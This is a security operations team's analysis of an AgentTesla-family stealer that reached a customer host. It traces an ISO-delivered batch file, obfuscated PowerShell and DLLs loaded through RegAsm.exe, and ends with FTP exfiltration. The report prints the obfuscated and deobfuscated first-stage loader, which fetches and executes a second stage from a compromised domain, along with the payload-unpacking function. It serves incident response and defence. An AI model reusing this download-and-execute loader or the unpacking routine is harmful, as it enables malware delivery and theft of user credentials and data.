Analysis of a stealer from the AgentTesla family

The SOC360 team monitors the networks, endpoints and cloud environments of the largest organisations in Poland, using EDR/XDR/NDR technologies from leading vendors (SentinelOne, Palo Alto Networks, CrowdStrike, MDE, Fidelis, Cybereason). During its analyses, the team encounters various types of software that security systems often classify ambiguously and that therefore require detailed verification of context. This verification makes it possible to respond appropriately and to issue sound recommendations.

Introduction

This report summarises the analysis of heavily obfuscated, recently developed software, not recognised by most commercial reputation engines, that was used to steal data from one of the hosts. The stages of the attack included downloading a malicious script, connecting to a URL in a Polish domain to download the second stage, downloading and running two independent .dll files, and finally stealing data from various sources and sending it to the attackers' FTP server.

A few days after the attack, the malicious script was attributed to the AgentTesla family – one of the most popular RATs/Stealers on the market.

First detection

On 1 February 2024, a suspicious .bat script was detected at one of our customers. The file path contained CdRom0, which suggested that an ISO image had been mounted on the host, a popular method of delivering malware in the period in question. The file was not signed, and the source process was identified as explorer.exe, which most likely means that the user ran the file manually after downloading it. On the day of detection, the file was marked as safe by all available TI sources and had been analysed in the cloud for the first time just two hours before detection. The detection in the EDR system deployed at the customer's site was triggered by a dynamic detection engine that verifies the full activity history of a suspicious process.

The following should be noted immediately:

The number and type of dynamic indicators, especially those that may suggest information theft.
Running PowerShell scripts, including those using processes classified as LOLBin.
CdRom0 in the path indicating the mounting of an ISO image – a typical entry vector during this period.
A file name imitating an Office document.
Creation of an alias for the Invoke-Expression function – one of many typical obfuscation methods.
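
As a rough illustration, some of the static indicators listed above can be checked with a few regular expressions during triage. This is only a sketch in Python: the function name, the indicator labels, the list of extensions and the example path are assumptions made for illustration and are not taken from the EDR product or from the incident data.

```python
import re

# Hypothetical triage helper: the labels and patterns below are illustrative assumptions.
ISO_MOUNT = re.compile(r"CdRom\d+", re.IGNORECASE)
OFFICE_DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pptx?)\.(bat|cmd|ps1|vbs|js)$", re.IGNORECASE)
ALIAS_CREATION = re.compile(r"(?<![\w-])(sal|set-alias|new-alias)\s", re.IGNORECASE)


def triage_indicators(image_path: str, command_line: str) -> list[str]:
    """Return the labels of the static indicators that match."""
    hits = []
    if ISO_MOUNT.search(image_path):
        hits.append("iso_mount_path")
    if OFFICE_DOUBLE_EXT.search(image_path):
        hits.append("office_like_double_extension")
    if ALIAS_CREATION.search(command_line):
        hits.append("alias_creation")
    return hits


# Example with a made-up path and command line
print(triage_indicators(r"\Device\CdRom0\Invoice.docx.bat", "powershell -c \"sal z ($rt -join '')\""))
```

Because the alias target is assembled at run time in this sample, the sketch flags alias creation itself rather than looking for the literal string Invoke-Expression. Dynamic indicators, such as behaviour suggesting information theft, cannot be derived this way and still require EDR telemetry.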

Analysis of the first script (fake text document)

The first script in the chain, clearly visible in the telemetry collected by the EDR system, was deobfuscated, which gave access to the next stages of the attack. The remaining scripts and the downloaded executable files were run in process memory and were not visible in the system telemetry. Despite this, quick reverse engineering of the first-stage script made it possible to download the subsequent stages and save them for further analysis before the attackers' infrastructure was rotated and became inaccessible.

“$rt=“x”,'e',“I”;[Array]::Reverse($rt);sal z ($rt -join “”);$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg=“[void”,'] [Syst',“em.Refle”,'ction. Assembly]::LoadWithPartialName(“'Microsoft.VisualBasic”')“;z($tpg -join ”');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New- Object',“t.We”,'bCli',“ent)”;$tty=z($tty55 -join “”);$tty;$rot=“Download”,'Str',“ing”;$rotJ=($rot -join “”); $bnt=“https”,'://regplast.pl/mx1.jpg';$bntJ=($bnt -join “”);$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)”

After deobfuscation, it looks like this:

# Force TLS 1.2 for outbound connections
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[void] [Reflection.Assembly]::LoadWithPartialName("Microsoft.VisualBasic")
# Wait until the host has internet connectivity
do {
    $ping = Test-Connection -ComputerName google.com -Count 1 -Quiet
} until ($ping)
# Download the second stage as text and execute it in the current session
$webClient = New-Object Net.WebClient
$url = "https://regplast.pl/mx1.jpg"
$content = $webClient.DownloadString($url)
Invoke-Expression $content

The script sets the alias ‘z’ for the Invoke-Expression cmdlet, which takes a string as a parameter and executes it as code. This alias is then used repeatedly, both to run the deobfuscation functions needed to decode subsequent fragments of malicious code and to execute that code in the context of the current console session. These actions continue until the very end of the data theft process. Most of the PowerShell code fragments executed by the malicious script were heavily obfuscated, e.g. by:

Splitting names and variables into multiple fragments
Reversing the order of characters in strings
Encoding strings using various methods, both native and manually implemented by malware developers
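
The first two techniques are easy to undo offline. The sketch below, written in Python as an analyst-side convenience, rebuilds two strings from the fragments visible in the first script. The helper names are hypothetical and the code is not part of the malware.

```python
from typing import Iterable


def join_fragments(fragments: Iterable[str]) -> str:
    """Undo name splitting: concatenate the fragments in their original order."""
    return "".join(fragments)


def reverse_and_join(fragments: Iterable[str]) -> str:
    """Undo [Array]::Reverse followed by -join: reverse the element order, then concatenate."""
    return "".join(reversed(list(fragments)))


# Fragments taken from the first-stage script
print(reverse_and_join(["x", "e", "I"]))             # Iex
print(join_fragments(["Download", "Str", "ing"]))    # DownloadString
```

Rebuilding the strings this way avoids having to execute any part of the sample just to see which cmdlet or method name it hides.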

The script then checks whether internet communication can be established and downloads further PowerShell code disguised as an image. The file comes from the address https://.pl/mx1.jpg. The domain belongs to a real Polish organisation that had previously been compromised by malicious actors. Using compromised infrastructure is very convenient for attackers: it not only helps to bypass security systems but also hinders the work of analysts. This is due, among other things, to the fact that:

detection engines do not detect the domain as malicious for a long time
its history, including the registration period and the registering entity, inspires trust (also in automated systems)
trusted SSL certificates do not arouse suspicion
network traffic looks standard (expected)
in some situations, it is impossible to block such domains immediately

Analysis of the second script

The file pretending to be an image, downloaded from the .pl domain, was another heavily obfuscated PowerShell script. It contained additional comments intended to convince anyone who viewed it that it served educational purposes (This script isn’t meant to be used for bad intentions. This is for educational purposes only.). This file was unknown to TI sources. For the purposes of this report, it will be referred to as MalPSScript1.ps1.

The file defined an encoded object, $m0ght, which was loaded into the session. To decode the command, it was necessary to:

Replace the letter ‘A’ with the string ‘00’ to obtain an array of bytes (each stored as an 8-bit binary number).
Convert each binary string to an integer value.
Convert the integer values to a string using UTF-8 decoding.
Use the previously loaded expression $bd="[system.String]::Join('', $m0ght)" to join the letters and create the final script.
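
The decoding steps above can be sketched in Python as follows. This is an illustration under stated assumptions, not the attackers' routine: it assumes that the encoded data is one continuous string of binary digits in fixed 8-bit groups, and the helper encode_for_demo exists only to produce test input.

```python
def decode_binary_payload(encoded: str) -> str:
    """Reverse the 'A' -> '00' substitution and decode the 8-bit groups as UTF-8."""
    bits = encoded.replace("A", "00")
    if len(bits) % 8 != 0:
        raise ValueError("bit string length is not a multiple of 8")
    # Each 8-character group is one byte written in binary
    values = [int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)]
    return bytes(values).decode("utf-8")


def encode_for_demo(text: str) -> str:
    """Hypothetical inverse, used only to build sample input for the decoder."""
    bits = "".join(f"{byte:08b}" for byte in text.encode("utf-8"))
    return bits.replace("00", "A")


sample = encode_for_demo("Write-Output 1")
print(decode_binary_payload(sample))
```

If the real sample stores each byte as a separate array element, the same substitution and conversion would be applied per element before joining the results.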

Function rt45fg00

Below is the fully deobfuscated function rt45fg00, which is part of the fake image and is responsible for the correct execution of the rest of the code:

function rt45fg00 {
    [CmdletBinding()] Param ([byte[]] $byteArray)
    Process {
        # 'z' is the Invoke-Expression alias set by the first script
        $gkdf = ('([IO.Compression.CompressionMode]::Decompress)') | z
        # Input stream over the compressed bytes
        $vwlOVUmY = ('New-' + 'Objec' + 't System' + '.IO.Mem' + 'oryStream( , $by' + 'teArray )') | z
        # Output stream for the decompressed bytes
        $pXWabbBT = ('Ne' + 'w-Obj' + 'ect Syst' + 'em.IO.Mem' + 'oryS' + 'tream') | z
        $lfKDElJ = New-Object System.IO.Compression.GzipStream $vwlOVUmY, $gkdf
        $ULxHecLpL = ('New' + '-Object by' + 'te[](10' + '24)') | z
        # Copy the decompressed data in 1024-byte chunks
        while ($true) {
            $iLQC = $lfKDElJ.Read($ULxHecLpL, 0, 1024)
            if ($iLQC -le 0) { break }
            $pXWabbBT.Write($ULxHecLpL, 0, $iLQC)
        }
        [byte[]] $bout = $pXWabbBT.ToArray()
        Write-Output $bout
    }
}

The function was responsible for decompressing the compressed code present in the rest of MalPSScript1.ps1 so that it could be executed. It decoded key variables that were then passed as parameters to the final functionality of the code. Its task was to build the $bout variable from the byte array passed to it as an argument, using GzipStream in decompression mode. The decoded result was a binary .dll file, which was later loaded into the session and used in the rest of the attack. This was a convoluted way of loading the .dll file in order to use the additional functions defined in it. The function call and the variables passed as arguments were, as expected, defined in randomly scattered fragments of the file to further complicate analysis.
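
For offline analysis, the same decompression can be reproduced without running the malicious PowerShell. The following Python sketch mirrors the 1024-byte read loop of rt45fg00 using the standard gzip module. The function name gunzip_in_chunks is hypothetical.

```python
import gzip
import io


def gunzip_in_chunks(data: bytes, chunk_size: int = 1024) -> bytes:
    """Decompress a gzip byte string by reading fixed-size chunks, as rt45fg00 does."""
    output = io.BytesIO()
    with gzip.GzipFile(fileobj=io.BytesIO(data), mode="rb") as stream:
        while True:
            chunk = stream.read(chunk_size)
            if not chunk:  # an empty read means the stream is exhausted
                break
            output.write(chunk)
    return output.getvalue()


# Round trip on harmless demo data
demo = b"MZ" + bytes(range(256)) * 20
print(gunzip_in_chunks(gzip.compress(demo)) == demo)
```

The chunked loop is kept only to stay close to the original function. Calling gzip.decompress on the whole buffer would give the same result.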

First deobfuscated .dll file

At the end of the script, there was a call to a function named Black, located in the toooyou namespace defined by the software developer. The arguments were the string ‘RegAsm.exe’ and a long byte array located in the file (the fake image). Such a call clearly indicates that the Black function had to be defined in the first of the long byte arrays.

RegAsm.exe is a well-known LOLBin process that can be used to load a .dll library and call the objects defined in it, thus deceiving simple security mechanisms and remaining undetected. Passing a byte array to the RegAsm.exe process and calling it in this way was expected behaviour.

Given the knowledge gained about the operation of the rt45fg00 function and the rest of the MalPSScript1.ps1 file, the following actions were performed on the first byte array ($y74gh00rffd) to better understand its role, as well as the role of the toooyou namespace and the Black function in the course of the attack:

W% was replaced with 0x to create a valid byte array.
The variable was specified as an argument to the rt45fg00 function and executed to decompress the content.
The file was saved to disk so that it could be debugged using external tools.
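
The steps above can be sketched in Python. The sketch assumes that the array is written as comma-separated tokens such as W%1F,W%8B, which is an assumption about the layout. The function names and the output file name in the usage note are also hypothetical.

```python
import gzip


def tokens_to_bytes(array_text: str) -> bytes:
    """Turn 'W%1F,W%8B,...' into raw bytes by restoring the 0x prefix (assumed layout)."""
    normalised = array_text.replace("W%", "0x")
    tokens = [token.strip() for token in normalised.split(",") if token.strip()]
    return bytes(int(token, 16) for token in tokens)


def looks_like_pe(data: bytes) -> bool:
    """PE files, including .NET assemblies, start with the 'MZ' magic bytes."""
    return data[:2] == b"MZ"


# Harmless demo data standing in for the embedded array
demo_payload = b"MZ\x90\x00demo"
demo_text = ",".join(f"W%{byte:02X}" for byte in gzip.compress(demo_payload))

decoded = gzip.decompress(tokens_to_bytes(demo_text))
print(looks_like_pe(decoded))
```

Once the check passes, the bytes can be written to disk (for example to a file named dll1.bin inside an isolated analysis environment) and opened in a .NET decompiler.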

Given the use of PowerShell scripts and the typical structure of such malware, the analysis suggested that this was a .dll library built with .NET. As expected, decompilation succeeded, which made it possible to analyse the first of the .dll libraries. For the purposes of this report, it was named dll1.dll. This file was unknown to TI sources. The main goal was to find the definition of the Black function used later in the script to load the second byte array.

Analysis of the second byte array

During the analysis, it was suspected that the dll1.dll file was mainly used to create obfuscated functions that allowed the attackers to run RegAsm.exe without detection. Therefore, most of the actual malicious functions should be in the second byte array, defined in the object named $IFmn. This was the same object that was passed as the second parameter alongside RegAsm.exe (the expected call to a malicious .dll using the RegAsm.exe LOLBin). Following steps similar to those used for dll1.dll, a second file was extracted from the script. For the purposes of this report, we will refer to it as dll2.dll. This file was unknown to TI sources. As expected, the dll2.dll file, prepared for invocation using RegAsm.exe, contained a number of obfuscated functions whose main purpose was to exfiltrate user data.

The file was heavily obfuscated. It contained a lot of unnecessary, unused code and references, randomly generated variable and function names, artificially created complex variables storing constant integer values and configuration parameters, etc. During the analysis, we managed to extract many suspicious functions referring to the Windows API, as well as non-standard, hand-written namespaces used to enumerate the host and then find and exfiltrate data from the victim's computer. Data theft included, among others:

monitoring keystrokes entered by the user
taking periodic screenshots of the victim's computer monitor
stealing the contents of the victim's clipboard (copy/paste)
stealing login details stored in popular web browsers
stealing data from misconfigured databases of various types
stealing data from vulnerable password storage applications

The subsequent functions called were structured to:

Enumerate the host (system, user, domain data, and much more).
Establish persistence on the host using the Task Scheduler.
Steal data from as many sources as possible and send it to the attackers' server.

All data was carefully collected into a coherent data structure before being sent to the attackers' server. The data included system and time information as well as the stolen data itself. It was possible to extract parameters indicating exfiltration via the FTP protocol.

FTP server

Each of the infected hosts had its own endpoint on the server to which its data was sent.

It is possible to log in to the FTP server using the credentials found in the decompiled .dll library. However, a specific infected endpoint must be identified first, because logging in alone does not allow the user to navigate to any directory other than the home directory. Each directory is named after the date, computer name and user, which makes it virtually impossible to search for other infected victims.

Summary

This analysis is an excellent example of how attackers use various code obfuscation methods to bypass security mechanisms and remain undetected, including when it comes to protecting the stolen data. A superficial analysis by an inexperienced analyst may result in the attack being overlooked, as TI sources are completely misleading in such cases (rotating metadata such as checksums is trivial). In such situations, an in-depth analysis is necessary for the analyst to obtain all the relevant information about the attack and, in particular, to take appropriate remedial action and prepare recommendations based on it. This is a good case study demonstrating the need to use EDR systems, search CTI sources in parallel, and reverse-engineer the code, including deobfuscation and decompilation. Based on specific code fragments and the obfuscation methods used, the threat was classified as a RAT/Stealer from the AgentTesla family.